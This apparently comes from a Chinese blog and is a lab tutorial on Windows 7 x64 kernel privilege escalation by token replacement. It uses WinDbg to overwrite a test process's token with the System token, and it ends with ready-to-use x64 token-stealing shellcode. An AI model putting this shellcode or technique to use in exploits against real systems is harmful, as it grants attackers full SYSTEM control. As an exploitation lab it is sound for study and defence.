Token替换提权实验

  • 内容
  • 评论
  • 相关

Token替换是windows内核提权中最常见的操作。

这里来说明一下什么是Token,以及Token替换怎样达到提权的操作。

这里我们先来写一段测试程序,很简单创建了一个cmd进程。

//RunCmd.exe

#include "windows.h"

int main()
{
    printf("Before Run cmd ..\n");
    getchar();

    system("cmd");
    return 0;
}

为什么要创建子进程呢,因为我们替换Token后并不能直接看到父进程的所有用户的变化。

但是子进程会继承父进程的Token相关属性,所以如果创建的子进程是是高权限用户,那么就可以代表替换成功。

我们看下这个程序的Token

// win7x64
kd> !process 0 0
...
PROCESS fffffa8002276060
    SessionId: 1  Cid: 0274    Peb: 7efdf000  ParentCid: 0838
    DirBase: 785ad000  ObjectTable: fffff8a00b5d5530  HandleCount:  12.
    Image: RunCmd.exe

kd> dt _EPROCESS fffffa8002276060 -d Token
nt!_EPROCESS
   +0x208 Token : _EX_FAST_REF

可以看到Token的偏移是0x208,来看下Token的值

kd> dq fffffa8002276060 + 0x208
fffffa80`02276268  fffff8a0`07d333e8 00000000`00068031

或者

kd>  dt _EX_FAST_REF 0xfffffa8002276060 + 0x208
nt!_EX_FAST_REF
   +0x000 Object           : 0xfffff8a0`07d333e8 Void
   +0x000 RefCnt           : 0y1000
   +0x000 Value            : 0xfffff8a0`07d333e8

可以看到:value的值是 0xfffff8a0`07d333e8

需要注意的是:这个数最后四位代表这个token的引用计数

也就是真正的Token指针是: fffff8a0`07d333e0

kd> ? 0xfffff8a0`07d333e8 & ffffffff`fffffff0
Evaluate expression: -8108766972960 = fffff8a0`07d333e0

我们可以看下这个Token的内容:

kd> dt _TOKEN fffff8a0`07d333e0
nt!_TOKEN
   +0x000 TokenSource      : _TOKEN_SOURCE
   +0x010 TokenId          : _LUID
   +0x018 AuthenticationId : _LUID
   +0x020 ParentTokenId    : _LUID
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x7fffffff`ffffffff
   +0x030 TokenLock        : 0xfffffa80`03054880 _ERESOURCE
   +0x038 ModifiedId       : _LUID
   +0x040 Privileges       : _SEP_TOKEN_PRIVILEGES
   +0x058 AuditPolicy      : _SEP_AUDIT_POLICY
   +0x074 SessionId        : 1
   +0x078 UserAndGroupCount : 0xd
   +0x07c RestrictedSidCount : 0
   +0x080 VariableLength   : 0x264
   +0x084 DynamicCharged   : 0x400
   +0x088 DynamicAvailable : 0
   +0x08c DefaultOwnerIndex : 3
   +0x090 UserAndGroups    : 0xfffff8a0`07d336e8 _SID_AND_ATTRIBUTES
   +0x098 RestrictedSids   : (null) 
   +0x0a0 PrimaryGroup     : 0xfffff8a0`06ee56c0 Void
   +0x0a8 DynamicPart      : 0xfffff8a0`06ee56c0  -> 0x501
   +0x0b0 DefaultDacl      : 0xfffff8a0`06ee56dc _ACL
   +0x0b8 TokenType        : 1 ( TokenPrimary )
   +0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )
   +0x0c0 TokenFlags       : 0x2000
   +0x0c4 TokenInUse       : 0x1 ''
   +0x0c8 IntegrityLevelIndex : 0xc
   +0x0cc MandatoryPolicy  : 3
   +0x0d0 LogonSession     : 0xfffff8a0`01bf4830 _SEP_LOGON_SESSION_REFERENCES
   +0x0d8 OriginatingLogonSession : _LUID
   +0x0e0 SidHash          : _SID_AND_ATTRIBUTES_HASH
   +0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH
   +0x300 pSecurityAttributes : 0xfffff8a0`02ee5a70 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
   +0x308 VariablePart     : 0xfffff8a0`07d337b8

或者:

kd> !token fffff8a0`07d333e0
_TOKEN 0xfffff8a007d333e0
TS Session ID: 0x1
User: S-1-5-21-1071733736-4194771383-3987741639-500
User Groups: 
 00 S-1-5-21-1071733736-4194771383-3987741639-513
    Attributes - Mandatory Default Enabled 
 01 S-1-1-0
    Attributes - Mandatory Default Enabled 
 02 S-1-5-32-544
    Attributes - Mandatory Default Enabled Owner 
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled 
 04 S-1-5-4
    Attributes - Mandatory Default Enabled 
 05 S-1-2-1
    Attributes - Mandatory Default Enabled 
 06 S-1-5-11
    Attributes - Mandatory Default Enabled 
 07 S-1-5-15
    Attributes - Mandatory Default Enabled 
 08 S-1-5-5-0-90708
    Attributes - Mandatory Default Enabled LogonId 
 09 S-1-2-0
    Attributes - Mandatory Default Enabled 
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled 
 11 S-1-16-12288
    Attributes - GroupIntegrity GroupIntegrityEnabled 
Primary Group: S-1-5-21-1071733736-4194771383-3987741639-513
Privs: 
 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - 
 08 0x000000008 SeSecurityPrivilege               Attributes - 
 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - 
 10 0x00000000a SeLoadDriverPrivilege             Attributes - 
 11 0x00000000b SeSystemProfilePrivilege          Attributes - 
 12 0x00000000c SeSystemtimePrivilege             Attributes - 
 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - 
 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - 
 15 0x00000000f SeCreatePagefilePrivilege         Attributes - 
 17 0x000000011 SeBackupPrivilege                 Attributes - 
 18 0x000000012 SeRestorePrivilege                Attributes - 
 19 0x000000013 SeShutdownPrivilege               Attributes - 
 20 0x000000014 SeDebugPrivilege                  Attributes - 
 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - 
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 24 0x000000018 SeRemoteShutdownPrivilege         Attributes - 
 25 0x000000019 SeUndockPrivilege                 Attributes - 
 28 0x00000001c SeManageVolumePrivilege           Attributes - 
 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled Default 
 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - 
 34 0x000000022 SeTimeZonePrivilege               Attributes - 
 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - 
Authentication ID:         (0,162aa)
Impersonation Level:       Anonymous
TokenType:                 Primary
Source: User32             TokenFlags: 0x2000 ( Token in use )
Token ID: b269a9           ParentToken ID: 0
Modified ID:               (0, b26710)
RestrictedSidCount: 0      RestrictedSids: 0x0000000000000000
OriginatingLogonSession: 3e7

替换System指针

kd> !process 0 0 System
PROCESS fffffa80018d0090
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00187000  ObjectTable: fffff8a0000017f0  HandleCount: 487.
    Image: System

kd> dq fffffa80018d0090 + 208
fffffa80`018d0298  fffff8a0`00004bb4 00000000`00000000

可以看到System进程的Token指针&引用计数是:fffff8a0`00004bb4

开始替换:

kd> dq fffffa8002276060 + 208
fffffa80`02276268  fffff8a0`07d333e8 00000000`00068031

kd> eq fffffa8002276060 + 208 fffff8a0`00004bb4

kd> dq fffffa8002276060 + 208
fffffa80`02276268  fffff8a0`00004bb4 00000000`00068031

这时候,在RunCmd界面按下enter键,并输入命令:

whoami

成功提权:

image

顺便附上一段x64下替换token Shellcode:

.CONST
    ; Windows 7 SP1 x64 Offsets
    KTHREAD_OFFSET     equ 188h   ; nt!_KPCR.PcrbData.CurrentThread
    EPROCESS_OFFSET    equ 70h    ; nt!_KTHREAD.ApcState.Process
    SYSTEM_PID         equ 04h    ; SYSTEM Process PID
    FLINK_OFFSET       equ 188h   ; nt!_EPROCESS.ActiveProcessLinks.Flink
    PID_OFFSET         equ 180h   ; nt!_EPROCESS.UniqueProcessId
    TOKEN_OFFSET       equ 208h   ; nt!_EPROCESS.Token

.CODE
ShellcodeTokenReplace PROC
    push rcx
    push rdx

    xor rax, rax
    mov rax, gs:[rax + KTHREAD_OFFSET]
    mov rax, [rax + EPROCESS_OFFSET]

    mov rcx, rax
    mov rdx, SYSTEM_PID

    SearchSystemPID:
        mov rax, [rax + FLINK_OFFSET]
        sub rax, FLINK_OFFSET
        cmp [rax + PID_OFFSET], rdx
        jne SearchSystemPID

    mov rax, [rax + TOKEN_OFFSET]
    mov [rcx + TOKEN_OFFSET], rax

    pop rdx
    pop rcx
    ret
ShellcodeTokenReplace ENDP

END